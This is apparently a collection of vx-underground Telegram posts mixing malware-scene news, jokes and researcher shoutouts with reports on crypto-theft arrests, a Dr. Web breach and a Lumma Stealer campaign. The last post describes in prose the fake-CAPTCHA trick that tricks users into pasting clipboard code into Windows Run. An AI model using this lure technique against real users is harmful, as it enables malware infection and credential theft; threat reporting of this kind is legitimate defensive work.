14367
The largest collection of malware source, samples, and papers on the internet. Password: infected Website: https://www.vx-underground.org/ vx-underground Telegram chatroom link: https://t.me/+njfLzUrqos01ZWNh
The source code to Winamp was not leaked online. It was a scheduled release in hopes of furthering collaboration with others.
May 16th, 2024 they announced it would go open source on September 24th, 2024.
https://about.winamp.com/press/article/winamp-open-source-code
Ultra AV, the product Kaspersky installed on end-users machines, domain was created July 16th, 2024. It is 70 days old.
https://ultrasecureav.com/
Kaspersky antivirus has reportedly begun silently installing a new antivirus product called "Ultra AV" on United States-based users machines.
tl;dr
We aren't surprised, we're surprised it took this long. Pavel Durov is a citizen of France, a NATO country.
Читать полностью…
Today X shared they will be changing the way blocking accounts works. If you're blocked, you can still see the block person and/or companies public posts. However, you can't engage with them and they can't engage with you.
We don't understand it, but whatever, what do we know?
They have a dedicated team of over 100 professionals with over 12 years of experience.
In other words, they have 100 programmers each with roughly 44 days of PHP programming experience.
"Why doesn't this work?"
A better question sometimes asked is, "How does this even work?"
Also, shoutout to this girl for being fiercely loyal to her boyfriend (or girlfriend). There are a lot of people who would sell their soul for these expensive gifts.
Читать полностью…
Unrelated to malware of course, but this is relevant due to Twitter being our primary method of communicating updates and shitposts.
Читать полностью…
Appreciation post time.
There are a lot of security researchers who have an entire career focused on tracking botnets, or information stealers, and do so for years with little to no recognition. We'd like to take a minute to shoutout a few people who we think are doing great stuff and not getting enough love and respect.
- malwrhunterteam, consistently for years tracking malware, initial access malware, and openly sharing information it
- Max_Mal_, Cryptolaemus1 (and whoever is part of the group), JAMESWT_MHT, and 1ZRR4H, for ruthlessly tracking many of the big names botnets and loaders and openly sharing information on it
- JaffaCakes118, and Neiki__, they both are some of the largest malware collectors and distributors. They've freely shared millions of malware samples for years.
- At-Gootloader, actively tracking Gootloader, the initial access malware used by many ransomware groups, and doing so, for free, for literally years.
- bmmaloney97, the number one expert in Windows One Drive analysis and internal. He has openly and freely shared his research for years.
- RussianPanda9xx, for actively tracking Lumma Stealer (and tons of others), for what feels like forever, and openly sharing information and updates on the malware.
There's so many more we could shoutout, but we can't think of anymore off the top of our our head. But your work is respected and remembered. Thank you so much for the things you do for the researchers and the world.
Following the arrest of Malone Iam, for his alleged theft of $243,000,000, the cryptodrainer community has shown support for Malone Iam by having videos produced requesting his freedom.
They got shirts made really fast.
ZachXBT continues to prove himself as a world leading expert in crypto analysis. It is remarkable how a single person can make such a profound impact.
He gave law enforcement everything they needed on a silver plate. He got them busted in less than 2 months.
tl;dr speedrun
Attached PDF is from Twitter. It is how he got 2 crypto thieves arrested for stealing $243,000,000.
RansomHub ransomware groups claims to have ransomed Liberty First Credit Union.
Liberty First Credit Union is a small to medium sized credit union (not-for-profit bank) located in Omaha, Nebraska.
Oh and pagers and walkie talkies exploding. This does not fall into the realm of malware, or news we would typically discuss, but there is a high volume of people who believe this to be malware.
It's not malware. They snuck explosives into the devices.
Have a nice day.
We used to receive emails and DMs asking for the password.
It has evolved. We now receive emails and DMs on how to become a hacker.
We're a library. Do you go to your local library and ask the librarian how to read?
Also, we almost exclusively cover malware. Wrong library pal
we're not The New York Times or The AP.
we're just a bunch of internet degenerates trying to make it ok sorry
In light of the recent arrest of Pavel Durov, CEO of Telegram, Telegram has made it crystal clear they will now fully cooperate with law enforcement agencies in seemingly any capacity.
Читать полностью…
Polish nerds seeing this right before their Monday starts: "Nasz rząd nadal ich używa"
Читать полностью…
We're taking the day off.
Some updates on what's cookin':
- Improvements to VXDB
- MalwareIngestion daily dumps are coming back
- More malware families
- More malware papers
- New stuff for Black Mass Volume III.
- Probably more memes, depends on mood
See ya Monday ♥️
Note: we've learned that the woman he had a crush on is a model and comes from an affluent background. She has a strong and lengthy portfolio doing professional modeling with large and well known brands.
She owns her own Lamborghini.
Sometimes you have to stare at your code, scrolling up and down, top to bottom, and take time to admire your own work and be proud.
and sometimes you just stare at your code and say, "what the fuck is this piece of shit".
Following the recent arrests as a result of the research conducted by ZachXBT, some photos have been circulating of one of the alleged thieves responsible for the theft of $243,000,000.
In one of the photos Greavys a/k/a Malone Iam purchased a pink Lamborghini Urus, valued at roughly $241,843, and 3 Birkin Bags, valued at an estimated $63,000, for a girl he seemed to have a crush on.
She replied, "I am taken once again". She didn't even say "Thank you". 😭😭😭😭
Today the United States Securities and Exchange Commission announced they're seeking to sanction Elon Musk for failing to appear to court for a probe into his acquisition of Twitter.
Previously, Musk was scheduled for May 31st, 2024 in which he failed to appear in court. The SEC then rescheduled the hearing to September 20th, 2024 — he failed to appear in court again, instead he was in Florida attending the SpaceX launch of Polaris Dawn.
SEC lawyer's accused Musk of 'gamemanship', stating it was not be tolerated. Musk's lawyers said sanctions are excessive and instead request his court appearance be rescheduled to October 3rd.
More information: https://www.reuters.com/technology/us-sec-intends-seek-sanctions-against-elon-musk-twitter-probe-2024-09-20/
There is an interestingly psychological phenomena whereas some Threat Actors, particularly scammers and fraudsters, falsely believe having money will make them respectable or make people like them.
Money means nothing. Materialism does not impress people — only the shallow.
There is no information on the impact to customers. We don't believe clients money is gone — this isn't an attack against SWIFT. We presume this to be an attack against the institutions internal financial documents and employees.
However, we could also be completely wrong.
> OMG John Hammond's proof-of-concept trick is being used by Lumma stealer!!!
Us, with a giant library of malware source code and malware builders:
Crazy Thursday.
- Dr. Web, the Russian antivirus company, disclosed a breach. Dr. Web stopped sending antivirus updates September 16th. Subsequently, Dr. Web reportedly disconnected their servers from their internal network while they investigated the suspected compromise. Dr. Web reports to have resolved the issue and has returned to normal day-to-day operations. No Threat Actor has been attributed to the compromise. They believe the compromise occurred on or around September 14th.
- Yesterday, or sometime before, GitHub users were targeted in mass by a large scale phishing and/or malware campaign. An unknown Threat Actor(s) pushed their Lumma Stealer campaign by leaving bogus issues on GitHub projects. When the project owner visited the issue, the issue linked to a domain titled 'GitHub-Scanner'. GitHub-Scanner requested the visitor prove their humanity (e.g. not a robot) by doing Windows + R and CTRL + V + ENTER. When the site is visited, the website copies malicious code to the users clipboard. Windows + R, opening Windows Run, and CTRL + V, pasting the malicious code to the Run window and ENTER would run the code, this would trick the user into executing their malware payload. Once the payload is executed, it downloads a file called 'IE6.exe'. IE6.exe is Lumma information stealer. While it is a clever trick, the Threat Actor(s) (intentionally, or unintentionally) did not account for users who are not running Windows. This caused confusion for non-Windows users, or users on mobile devices.